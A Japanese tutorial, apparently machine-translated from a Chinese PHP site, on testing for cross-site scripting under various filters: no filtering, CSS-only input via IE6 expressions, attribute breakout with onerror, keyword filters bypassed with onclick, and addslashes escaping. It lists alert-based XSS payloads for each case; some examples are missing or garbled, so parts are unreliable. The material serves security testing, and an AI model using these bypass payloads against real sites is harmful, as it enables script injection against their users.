xss の小規模テストはどのように行われますか?

• #セキュリティ制限なし、直接使用

##<script>alert(/xss/);</script>

• 制限: CSS のみを使用でき、HTML タグは許可されません

式を使用して XSS を構築できることはわかっていますが、テストできるのは IE でのみです。 , IE6で以下のテストを行ってください。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

• 制限事項: HTML はエスケープされ、Image タグは使用可能です

  。

テストに入力された文字は src アドレスに挿入されるため、擬似プロトコルを使用してそれを回避できます。

直接入力

alert( /xss/);

または、イベントを使用して回避することもできます。次のように、最後のステートメントに注意してください:

1" onerror=alert(/xss/) ; var a="1

• 制約条件：キーワードフィルタリングを使用します。

テストしましたが、ほとんどがフィルタリングされましたが、一部はフィルタリングされませんでした。script/onerror をテストした後、フィルタリングされましたが、onclick はフィルタリングされませんでした。onclick イベントを使用してバイパスしてください

<img src=# onclick=alert(/xss/);>

• 制限: 特徴的な文字をエスケープするには、アッドスラッシュを使用してください

つまり、一重引用符、二重引用符などは、 XSS ステートメント、特徴的な文字。

<script>alert(/xss/);</script>

を直接使用して

をバイパスするか、次のように String.fromCharCode メソッドを使用します。

以上がxss の小規模テストはどのように行われますか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。